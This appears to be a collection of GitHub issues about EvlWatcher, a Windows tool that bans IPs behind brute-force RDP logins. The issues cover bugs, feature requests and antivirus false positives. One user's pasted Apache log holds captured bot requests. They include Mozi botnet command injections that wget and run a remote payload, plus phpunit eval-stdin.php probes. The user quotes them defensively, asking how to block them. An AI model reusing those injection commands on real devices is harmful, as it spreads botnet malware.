In this ancient operating system EvlWatcher throws an error every 30 seconds in Live tab, trying to look for a non existing event log:

12/04/2021 13:08:01 - [Error]: Event Log Microsoft-Windows-RemoteDesktopServices-RdpCoreTS/Operational was not found, tasks that require these events will not work

Seems that Windows 2008 R2 needs another ruleset to work properly.

currently if an IP is on the temporarily banned list it can be transferred to permanently banned list and white-listed IP list only. In a world on dynamic IP addresses this is unfortunate. If the temporarily banned IP list includes a false positive this IP needs to be permanently whitelisted where the admin probably wants to just remove it from the temporarily banned IP list instead.

Therefore it would be great to have an additional button underneath the "temporarily banned IPs" list to just remove the selected IP(s) from it.

Fresh install (win7), attempted to open the GUI and it crashed. Service is running. Couldn't find any quick/obvious fixes on google. Any ideas? Cheers

Really a good sofware, my RDP's was constantly brute-forced by random IP's and often i couldn't login to them.
I have some improvement/feature requests.

• Local ip list backup/sync with software updates/reinstall [ Urgent] EDIT: was moved to own issue
• Dark mode
• IP whois/region info either by third party or implemented inside app

Thanks @shimuldn for suggestion to use this.

So different rules can trigger similar actions (i.e. Ip ban)

Hello,

Does this log failed login attempts to a log file anywhere? I only see blacklisted ips in the config.xml file.

Thanks

Hi!

After researching an issue with a RDS envoirment, i came across your application. It looks awesome, simple and to the point. I Do have a question on implememting it though; how does a setup with a RD Gateway work? is EvlWatcher installed on the central RD gateway? or on each RDS host within the farm?

Kind Regards.

We should describe that EvlWacher need to be installed via installer, and installs the following components

• a service
• a client

will do that on the weekend

Any chance on a new console app when you finish the rewrite?

Thanks for all your hard work on this project. I love it! Except one thing.

Maybe it's just me, but when I open the console, it feels like I'm being flipped off. I know it's meant for the hackers, but could we add an option to customize the background images? Or even just replace the image with a cross-out symbol like this:
https://upload.wikimedia.org/wikipedia/commons/thumb/3/31/ProhibitionSign2.svg/1200px-ProhibitionSign2.svg.png

I also don't want to have to look over my shoulder to see if my kids are watching when I open the console.
Thanks in advance.

Hello,

I've just setup a WAMP server (https://www.uniformserver.com/) on my Windows 10 computer and was wondering if EvlWatcher could help me secure it. I would like to add Apache logs to EvlWatcher (which are located at «D:\Logiciels\UniServerZ\core\apache2\logs\access.log»).

What bothers me are the following lines that are probably executed by bots looking for vulnerabilities in web servers:

XXX.XXX.XXX.XXX - - [10/Mar/2021:23:43:11 -0500] "Gh0st\xad" 400 226
XXX.XXX.XXX.XXX - - [10/Mar/2021:23:43:15 -0500] "HELP" 400 226
XXX.XXX.XXX.XXX - - [10/Mar/2021:23:43:15 -0500] "\x1b\x84\xd5\xb0]\xf4\xc4\x93\xc50\xc2X\x8c\xda\xb1\xd7\xac\xafn\x1d\xe1\x1e\x1a3*\x85\xb7\x1d'\xb1\xc9k\xbf\xf0\xbc\n" 400 226
XXX.XXX.XXX.XXX - - [10/Mar/2021:23:43:17 -0500] "\x16\x03\x01" 400 226
XXX.XXX.XXX.XXX - - [11/Mar/2021:00:29:07 -0500] "GET /wp-login.php HTTP/1.1" 301 -
XXX.XXX.XXX.XXX - - [11/Mar/2021:00:29:23 -0500] "GET /wordpress/wp-login.php HTTP/1.1" 301 -
XXX.XXX.XXX.XXX - - [11/Mar/2021:00:29:35 -0500] "GET /blog/wp-login.php HTTP/1.1" 301 -
XXX.XXX.XXX.XXX - - [11/Mar/2021:00:29:50 -0500] "GET /wp/wp-login.php HTTP/1.1" 301 -
XXX.XXX.XXX.XXX - - [11/Mar/2021:00:45:05 -0500] "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://XXX.XXX.XXX.XXX:47037/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0" 404 3167
XXX.XXX.XXX.XXX - - [11/Mar/2021:02:19:15 -0500] "27;wget%20http://%s:%d/Mozi.m%20-O%20->%20/tmp/Mozi.m;chmod%20777%20/tmp/Mozi.m;/tmp/Mozi.m%20dlink.mips%27$ HTTP/1.0" 400 226
XXX.XXX.XXX.XXX - - [11/Mar/2021:03:43:56 -0500] "GET /a2billing/customer/templates/default/footer.tpl HTTP/1.1" 404 1183
XXX.XXX.XXX.XXX - - [11/Mar/2021:03:43:58 -0500] "\x16\x03\x01" 400 226
XXX.XXX.XXX.XXX - - [11/Mar/2021:04:08:37 -0500] "POST /boaform/admin/formLogin HTTP/1.1" 301 -
XXX.XXX.XXX.XXX - - [11/Mar/2021:04:34:03 -0500] "GET /recordings/ HTTP/1.1" 301 -
XXX.XXX.XXX.XXX - - [11/Mar/2021:05:18:43 -0500] "GET /vtigercrm/vtigerservice.php HTTP/1.1" 301 -XXX.XXX.XXX.XXX - - [11/Mar/2021:06:01:32 -0500] "GET /about.php HTTP/1.1" 301 -
XXX.XXX.XXX.XXX - - [12/Mar/2021:01:03:52 -0500] "POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 301 -
XXX.XXX.XXX.XXX - - [12/Mar/2021:01:03:52 -0500] "POST /phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 301 -
XXX.XXX.XXX.XXX - - [12/Mar/2021:01:03:52 -0500] "POST /phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 301 -
XXX.XXX.XXX.XXX - - [12/Mar/2021:01:03:53 -0500] "POST /phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 301 -
XXX.XXX.XXX.XXX - - [12/Mar/2021:01:03:53 -0500] "POST /phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 301 -
XXX.XXX.XXX.XXX - - [12/Mar/2021:01:03:53 -0500] "POST /vendor/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 301 -
XXX.XXX.XXX.XXX - - [12/Mar/2021:01:03:53 -0500] "POST /vendor/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 301 -
XXX.XXX.XXX.XXX - - [12/Mar/2021:01:03:53 -0500] "POST /vendor/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 301 -
XXX.XXX.XXX.XXX - - [12/Mar/2021:01:03:53 -0500] "POST /lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 301 -
XXX.XXX.XXX.XXX - - [12/Mar/2021:01:03:53 -0500] "POST /lib/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 301 -
XXX.XXX.XXX.XXX - - [12/Mar/2021:01:03:53 -0500] "POST /lib/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 301 -
XXX.XXX.XXX.XXX - - [12/Mar/2021:01:03:53 -0500] "POST /lib/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 301 -
XXX.XXX.XXX.XXX - - [12/Mar/2021:01:03:54 -0500] "POST /wp-content/plugins/dzs-videogallery/class_parts/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 301 -
XXX.XXX.XXX.XXX - - [12/Mar/2021:01:03:54 -0500] "POST /wp-content/plugins/jekyll-exporter/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 301 -
XXX.XXX.XXX.XXX - - [12/Mar/2021:01:03:54 -0500] "POST /wp-content/plugins/cloudflare/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 301 -

etc.

Could EvlWatcher help with this?

Thank you very much for your time!

I multi-select temp banned IPs and click the 'lock' for each IP to permanently ban it. It would be cool if:

• When multi-selected, add all temporary IPs to permanent IPs at once (not having to click the lock for each selected IP), or
• An "Add all" button to add all temporary IPs to the permanent list without selecting any.

Sometimes I have a lot of temp banned IPs and I want to bulk-add them all and get on with life. Thank you for the consideration.

Great, well, now obviously, windows defender thinks we are a virus.
Well, we are not windows defender, but we are defending windows! (joke)

So, what can we do about that.. do we need a signed app?

after #24 is done, replace the fakedata with service query.

• that should be logged ONCE at service start, and not every 30 seconds
• rules need a ignore option, so they can be ignored for OS-Versions where the rule is not applicable

Could you even potentially support custom IP reporting? Possibly EvlWatcher could scan the local database for entries that have been added from other services, like WebAPI that has detection if IP is trying to brute it's way, it could add entries into the database table, then EvlWatcher could occasionally scan that table for increases in the count of the trouble IP and act on it?

By the way, I just found your solution. Sucks regarding the Windows Defender, I had to allow the setup program to get it installed and even just to allow the file to remain to do the MD5 scan on it. I'm hoping to test this more and send some money your way for your hard work. I always saw the Failed Audit entries in the event log for RDP and didn't know what to do, thought of writing my own, but look you did it! 👍

Originally posted by @snblackout in #36 (comment)

Not only IP ban, also a Telegram-Notifier, maybe a email notifier, and so on.
Will be done by plugin principle, so anyone can add actions and rules

• add a tooltip to every button
• add some storytelling images in the background, so its more intuitive

That app should be able to generate and modify rules, and see their results.

192.168.* is present in the white-listed IP patterns but some IPs on the local network are added to the banned lists, e.g. 192.168.1.230. Adding 192.168.1.* to the white-list doesn't resolve this either. Removing the banned IPs from the list only results in them being added again at some future point.

Future plan:
Auto-update the software or an option to check the update available, click to download and install or something similar for a better user experience.

Before we release, 2.0 we need a (small and straightforward) Docu. Explaination, Screenshots, a simple HOWTO, and whatnot, instead of the v2.0 announcement.

The current nullsoft NSIS Installer is OK, but a new one, maybe with auto update would be nice´r

This can be quite useful. Thanks for the great work.

Permanent Ban list auto backup & restore is required for an update or reinstall.

Originally posted by @shimuldn in #48 (comment)

When a new version is installed, the config.xml is replaced and all local lists (Permanent Ban list, Whitelist) are lost.

Hello,

It appears as of today Microsoft's Windows Defender is flagging the installer for version 2.0 as a severe trojan, specifically "Trojan:MSIL/Masslogger.VN!MTB".

As this is on a network share of my pooled software downloads I couldn't be sure if it's the installer specifically being pointed out or the actual application binary within.

Obviously I'd be quite sure there isn't a genuine risk here, particularly as both Jotti's scanner finds nothing and VirusTotal looks like detections are just machine learned, but you'll likely need to submit your binaries to Microsoft for closer inspection and delisting here: https://www.microsoft.com/en-us/wdsi/filesubmission

For easy tasks

Found many attacker IPs on the log but EW didn't block properly. Please take a look at the logs files Gitter.

Thank you for your hard work.

I have few 2019 servers and i can test.

Now using v1.4 and V2.0 alpha.
Alpha seems unstable.

Let me know how can I help.

need to create a tab where all the generic tasks can be configured ..

in future versions maybe even created, uploaded and downloaded from a repo

Spammers are trying to crack the password by doing Brute-force attack.

I can provide you logs if needed.
If you need a windows server for testing you may signup for GCP or any other cloud trial. If not in this case i may help you to get access.

Blocking needs to improve.

Originally posted by @shimuldn in #14 (comment)

EvlWatcher-v2.0 alpha Using too much ram after some days of 24/7 server running.

I see the server using the full ram around 6 GB. After a reboot, it goes back to normal. Happen on my 2 servers 2019.
On Task Manager I see Cached almost all the ram server had.

Would love to help beta test, I can potentially provide a small test server for you as well.

As far as help coding, I am not the greatest when it comes to windows but once I have more free time (crazy time at work) I would be more then willing to give it a shot.

• ILogger should get a SetConsoleHistoryMaxCount(int count), and a IList<ConsoleEntry> GetConsoleHistory(),

• ConsoleEntry maybe being an Object with DateTime and String

• 'DefaultLogger' should then implement that it keeps the last X entries saved, in a List that doesnt grow larger over time.

• So that with GetConsoleHistory() you can get it back

• Then, _logger should take the backlog size from the config
  
  

• Finally, the IEvlWatcherService Interface needs a function to provide the last Output to te Console.

that would be the server side of what is needed, so that the console can display live what the service is doing at the momen

Having some reporting in the logs or some way to track a certain IP better over time would be better.
Originally posted by @snblackout in #37 (comment)

We are using a non-standard port for RDP. When we enter wrong passwords (+5) it doesn't ban us temporarily. Would something have to be configured for this case?

Enviroment: Windows 10 professional 1909 and windows 10 professional 2004. EvlWatcher version 1.4 in both.

I love EvlWatcher and been using it for several years at this point. Please, add a way so we can support the project. I'd recommend adding multiple ways.

• Patreon (monthly subscription/support)
• Paypal (for direct donation)
• Bitcoin/other coin wallet addresses (for crypto)

There is a thing called "Open Collective" but I don't think it's the tool for this project.
Thank you for your hard work. Also, please add the old binaries somewhere.

To combine log entries

Not sure if it will be in V2, nut should be done somedaay

Have to go to C:\Program Files (x86)\EvlWatcher to find the console app.
A shortcut on Startmenu also on Desktop will make this software user-friendly for normal users.

Adding on the Desktop can be optional.
It's a matter of 3 clicks adding the shortcut on Desktop for us but some users may struggle a little bit.

Again it's a less priority feature so take your time.

Thank you for making the Internet safe a little bit.
Thank you for your time.

I did notice going through, some have a very high trigger count. Looking at the console, that IP is not in the temp or perma banned. Interesting.

BlockRDPBrutersBySecurity4625: found 186.96.174.85, trigger count is 376

Originally posted by @snblackout in #44 (comment)

refactor to SOLID before we start

Rules still run after restarting service, regardless of "Active" setting in config.xml.
Workaround: backup config.xml and delete Task.

I noticed a lot of bans on individual ip address coming from a /24 subnet. I would like to be able to enter a wildcard ban on a subnet to permanent bans but it is not currently possible as the wildcard is not a valid ip address

@devnulli thanks again for your prompt replies and improvements.

On one of my servers I checked to see how many event logs were being created in 1 hour and it's about 3600, which is kind of a lot so if other applications on the server have issues, the service is pushing them down and out of view quickly.

I propose a better way for reporting. Potentially a button on the console that you can create an HTML report of the data the server has of IPs and saves it to a particular folder to open in a browser to look through.

Thoughts?

I try on Windows Server 2016. A console shows this error before the application shown.

Unhandled Exception: System.ServiceModel.AddressAlreadyInUseException: Cannot listen on pipe name 'net.pipe://localhost/' because another pipe endpoint is already listening on that name. ---> System.IO.PipeException: Cannot listen on pipe name 'net.pipe://localhost/' because another pipe endpoint is already listening on that name.
   --- End of inner exception stack trace ---
   at System.ServiceModel.Channels.PipeConnectionListener.Listen()
   at System.ServiceModel.Channels.ExclusiveNamedPipeTransportManager.OnOpen()
   at System.ServiceModel.Channels.TransportManager.Open(TransportChannelListener channelListener)
   at System.ServiceModel.Channels.TransportManagerContainer.Open(SelectTransportManagersCallback selectTransportManagerCallback)
   at System.ServiceModel.Channels.TransportChannelListener.OnOpen(TimeSpan timeout)
   at System.ServiceModel.Channels.ConnectionOrientedTransportChannelListener.OnOpen(TimeSpan timeout)
   at System.ServiceModel.Channels.NamedPipeChannelListener`2.OnOpen(TimeSpan timeout)
   at System.ServiceModel.Channels.CommunicationObject.Open(TimeSpan timeout)
   at System.ServiceModel.Dispatcher.ChannelDispatcher.OnOpen(TimeSpan timeout)
   at System.ServiceModel.Channels.CommunicationObject.Open(TimeSpan timeout)
   at System.ServiceModel.ServiceHostBase.OnOpen(TimeSpan timeout)
   at System.ServiceModel.Channels.CommunicationObject.Open(TimeSpan timeout)
   at EvlWatcher.EvlWatcher.OnStart(String[] args)
   at EvlWatcher.EvlWatcher.Main(String[] args)